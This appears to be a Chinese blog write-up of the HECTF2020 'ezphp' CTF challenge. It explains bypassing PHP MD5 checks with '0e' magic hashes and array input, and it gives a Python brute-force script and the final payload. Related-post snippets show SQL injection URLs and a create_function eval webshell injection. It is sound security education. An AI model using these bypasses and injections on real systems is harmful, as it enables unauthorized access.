HECTF2020题解之ezphp

最新推荐文章于 2024-09-06 19:20:18 发布
最新推荐文章于 2024-09-06 19:20:18 发布
阅读量747 收藏
点赞数
分类专栏: CTF 初学 文章标签: python php 字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrs_h/article/details/112185286
版权
CTF 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
初学
9 篇文章 0 订阅
订阅专栏

HECTF2020题解之ezphp

一 题目的来源

这道题的前身来源于NCTF2019的一道题名为“easyphp”,在HECTF中并没有完全复刻上述的题目,只是对其中的两个考点进行了参考,这篇文章也将对这其中的两个考点进行讲述。本文在在行文过程中同样参考了NCTF2019的官方wp,链接会放在文章最后。

二 题目描述

<?php 
error_reporting(0);
highlight_file(__file__);
include('flag.php'); 
$string_1 = $_GET['str1']; 
$string_2 = $_GET['str2']; 

if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){

        if(is_numeric($string_1)){ 
            $md5_1 = md5($string_1); 
            $md5_2 = md5($string_2); 
            if($md5_1 != $md5_2){ 
                $a = strtr($md5_1, 'cxhp', '0123'); 
                $b = strtr($md5_2, 'cxhp', '0123'); 
                if($a == $b){
                    echo $flag;
                }
                else {
                    die('you are close');
                }
            }  
            else {
               die("md5 is wrong"); 
            }
            } 
        else {
        die('str1 not number'); 
        }
    }
else {
    die('you are wrong!');
}
?>

考点一,md5校验漏洞

PHP在进行哈希值的相关比较的时候,如果字符串以0e作为开头的话,PHP会忽略后面的字符,并将其解释成0,所以两个不同的字符串经过md5加密后所得到的字符串是0e开头的话,PHP会将其判断成相等字符串。
还有一种情况就是经典的数组方案了,如果往md5()中传入数组参数的话,函数会返回null,所以当两个传入字符均是数组的话,那么就会出现null=null的情况,两者被判定为相等。
下面是一些经过md5加密之后开头是0e的例子:

	QNKCDZO
    240610708//经典永流传
    s878926199a
    s155964671a
    s214587387a
    s214587387a

考点二,php弱类型

截取题中的两行来看:

if($md5_1 != $md5_2){ 
                $a = strtr($md5_1, 'cxhp', '0123'); 
                $b = strtr($md5_2, 'cxhp', '0123');

显然,题目想让我们将两个字符串md5加密过后,使其不相等,等到将两个字符串中的“c”,“x”,“h”,“p”相应的替换成“0”,“1”,“2”,“3”之后再使其相等。从常识中我们知道md5加密过后的字符串是不会存在“x”,“h”,“p”这三种字符的。
所以,目标就转向了“c”与“0”的置换当中。从上面的分析过程我们我们可以得出一个结论,我们要找的一个关键的字符串它的开头应该是ce这样的话,程序的执行才能进入if中,至于另外一个字符串,咱们只需挑选一个开头是0e的字符串即可。

最后,求字符串脚本

import hashlib

def makemd5(s):
    return hashlib.md5(s.encode('utf-8')).hexdigest()

s = '0123456789c'

for i in range(10000000000):
    md5 = makemd5(str(i))
    if md5[0:2] == 'ce':
        if all(map(lambda x: x in s, md5[2:])):
            print(str(i)+"   "+md5)
            break

运行脚本过后,我们会得到一个字符串“9427417”其加密过后是“ce156443c7c7c4c63366466c25317636”满足条件。随即构造payload:?param1=s878926199a&param2=s155964671a&str1=9427417&str2=240610708
[1]: http://meta.math.stackexchange.com/questions/5020/mathjax-basic-tutorial-and-quick-reference
[2]: https://mermaidjs.github.io/
[3]: https://mermaidjs.github.io/
[4]: http://adrai.github.io/flowchart.js/

入山梵行
关注
专栏目录
[HFCTF2022]ezphp
snowlyzz的博客
10-24 2627
FastCgi 缓存文件加载恶意so
md5强弱碰撞(HECTF ezphp
qq_47168481的博客
10-31 1730
很惭愧,学了这么久才领会到md5碰撞 参考网站:浅谈md5碰撞 直接上题目 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET['str1']; $string_2 = $_GET['str2']; if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['par
[SWPUCTF 2022 新生赛]ez_ez_php
最新发布
weixin_73049307的博客
09-06 367
这行代码检查通过GET请求传递的参数file的前三个字符是否等于"php",是的话就执行。(注意:这里我反应过来直接是flag就可以了,不用flag.php
[BJDCTF2020]EzPHP
feng的博客
12-27 1480
知识点 base32 url编码绕过 preg_match在非/s模式下的绕过 $_POST和$_GET的优先级 PHP伪协议。 sha1函数的数组绕过。 create_function()的代码注入 WP 这个题目真的挺难的,尤其是最后的create_function代码注入,整个题目的考点太多,真的就是看学的扎实不扎实了,是一道非常好的题目。 首先进入环境,f12发现: 比较明显的base32,解码后得到1nD3x.php。访问一下,可以得到源码: <?php highlight_file(
[BJDCTF2020]easy
weixin_52034946的博客
02-01 243
32位ida打开,主函数没有发现什么有用的信息 查看字符串也没有新的发现,但是在函数列表里,在main函数前面有一个函数,ques没有执行(程序都是从main函数往下执行的),查看 ques 我这里是IDA7.5版本,我看了一些别人的wp,伪代码不太一样. 然后这里的一些数字被我转化成char了,所以写过迷宫题的看到 ‘*’ 一般都会猜测这是个迷宫,这里先想着吧迷宫写出来 思路 大致看了下代码,有俩个地方LOWORD,HIDWORD,不懂 这里查了下资料 for循环50次,就代表一共有50个数字,然
[BJDCTF 2020] EzPHP
weixin_51804748的博客
11-15 4713
前言 最近经常见到BJDCTF赛题的改版,其中有一道很经典的代码审计题目,写篇博客学习一下 https://github.com/BjdsecCA/BJDCTF2020 Part 1 (主页) 打开题目之后是一个网页,并没有和解题有关的信息 查看源代码后发现注释信息中有提示GFXEIM3YFZYGQ4A=,用base解码后得到信息1nD3x.php 访问/1nD3x.php得到源码 <?php highlight_file(__FILE__); error_reporting(0);
[MRCTF2020]Ez_bypass(PHP代码审计)
kuller_Yan的博客
10-22 331
[MRCTF2020]Ez_bypass(PHP代码审计) 访问页面,查看源代码有格式排好了的php代码: <?php I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; i
python-leetcode面试题解之第54题螺旋矩阵-题解.zip
03-19
标题中的“python-leetcode面试题解之第54题螺旋矩阵-题解.zip”表明这是一个关于Python编程语言的LeetCode面试题解答,具体是针对第54题——螺旋矩阵(Spiral Matrix)的解题代码和分析。LeetCode是一个在线平台,...
2020CCPC网络赛题解.pdf
07-12
从提供的文件【标题】和【描述】来看,文档内容应该是一份关于2020年全国计算机系统能力挑战赛(China Collegiate Programming Contest, 简称CCPC)网络赛的题解资料。【标签】"CCPC 题解"进一步证实了这一点。 ...
python-leetcode面试题解之第31题下一个排列-python题解.zip
03-12
"python-leetcode面试题解之第31题下一个排列-python题解.zip" 这个标题表明这是一个关于Python编程语言的资源包,专门针对LeetCode平台上的第31题“下一个排列”的解决方案。LeetCode是一个知名的在线编程挑战平台...
python-leetcode题解之046全排列
08-20
python python_leetcode题解之046全排列
python-leetcode题解之061旋转链表
08-21
python python_leetcode题解之061旋转链表
[ctfshow web入门]常用姿势817-820 &&虎符ctf ezphp
weixin_45751765的博客
05-09 1326
0x00 前言 接上一篇继续记录ctfshow web入门常用姿势 嗝 820 非常规文件上传 php中的base64_decode只对合法字符合并后进行解码,非法字符会直接丢弃,不参与整体的base64解码 合法字符包括 A-Za-z0-9/+ 字母26+26 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-04-30 10:52:40 # @Last Modified by: h1xa # @Last Mod
end 21-4-19
qq_45781155的博客
04-19 198
强网杯 2019 随便注 http://www.bmzclub.cn:20431/?inject=1';show database;# http://www.bmzclub.cn:20431/?inject=1';show tables;# http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;# http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla
[GYCTF2020]Easyphp
feng的博客
03-08 1990
前言 知识点: www.zip源码泄露 PHP反序列化链POC 代码审计 WP 进入环境,题目是easyphp我就感觉要审源码。。。试了一下常见的泄露,发现存在www.zip。把代码下载下来进行一下审计,发现update.php和lib.php可以利用: <?php session_start(); function safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\
2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass
m0_51326092的博客
08-23 335
首先,本文借鉴的大老婆博客如下: 出题大佬博客,详细讲解了各种知识点 一位大佬的详细解题过程(偷懒,自己就不写了) 就简单写写(赋值粘贴)一些比较重要的知识点(× create_function函数: 看似平平无常,却暗藏杀机 <?php $myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\'); ?> 执行后,很明显有一句话注入,可以拿到权限 function myFunc($a, $b){
CTF学习笔记——[BJDCTF2020]Easy MD5
Obs_cure的博客
08-18 717
一、[BJDCTF2020]Easy MD5 1.题目 2.解题步骤 题目是一个简简单单查询框。因为太忙好久没做题,之前某次试水看了一次WP,记得是在响应头有信息,摸过来看一下 这里一句SQL提示了注入的信息,首先是进行了MD5的运算 他会将输入的字符串进行原始的16字符二进制格式加密,然后返回结果,之后再向前看,与admin进行比对。 3.总结 4.参考资料 ...
HFCTF2022 Web ezphp
Sk1y的博客
03-28 5783
HFCTF2022 文章目录HFCTF2022ezphp ezphp 这个题目本来以为考点是p佬的文章,但是不是这样的。 p佬文章:我是如何利用环境变量注入执行任意命令
[HFCTF2020]JustEscape
shinygod的博客
04-12 580
知识点:vm2沙盒逃逸 提示了一个run.php文件,没法利用,eval里的就不是一个变量。 <?php if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code); } else { highlight_file(__FILE__); } ?> 凑得处可以计算。 Error().stack测下
2020武大编程竞赛预赛题解与分析
"2020武大校赛预赛题解1" 在这篇关于2020年武汉大学校赛预赛的题解中,我们可以看到一些关键的竞赛数据和一道具体问题的解析。首先,这次编程竞赛收到了4122份提交代码,共有422名参赛选手参与,其中312名选手至少...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值